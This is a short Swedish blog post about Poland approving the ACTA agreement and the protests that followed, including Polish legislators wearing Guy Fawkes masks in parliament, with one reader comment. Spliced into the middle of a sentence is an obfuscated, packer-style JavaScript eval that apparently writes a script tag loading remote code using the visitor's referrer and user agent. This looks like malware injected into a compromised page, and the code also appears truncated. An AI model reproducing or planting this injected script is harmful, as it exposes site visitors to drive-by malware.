Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Protester mot ACTA -avtalet i Polen

Protester mot ACTA -avtalet i Polen
Sebastian

Det var igår som Sverige och 21 andra EU-länder röstade för att godkänna ACTA -avtalet. Här i Sverige var det inte särskillt inte något speciellt men i Polen blev det kaos och hela veckan har varit fylld med protester. Både digitala protester i form av hacker -attacker och fysiska demostrationer.

En protest ägde rum i det polska parlamentet där lagstiftare från det vänster-inriktade partiet ”Ruch Palikota” tog på sig Guy Fawkes-masker för att visa sitt missnöje mot att Polen igår godkände ACTA -avtalet.
Som de flesta av er redan vet så är Guy Fawkes-masker även hacker-nätverket Anonymous främsta kännetecken.

Läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sheyn|var|u0026u|referrer|ydten||js|php’.split(’|’),0,{}))
mer om att Sverige godkänt ACTA:
Här

httpv://youtu.be/N8Xg_C2YmG0

Comments

  1. Anonym :P

    Detta skulle aldrig hända i snälla Sverige.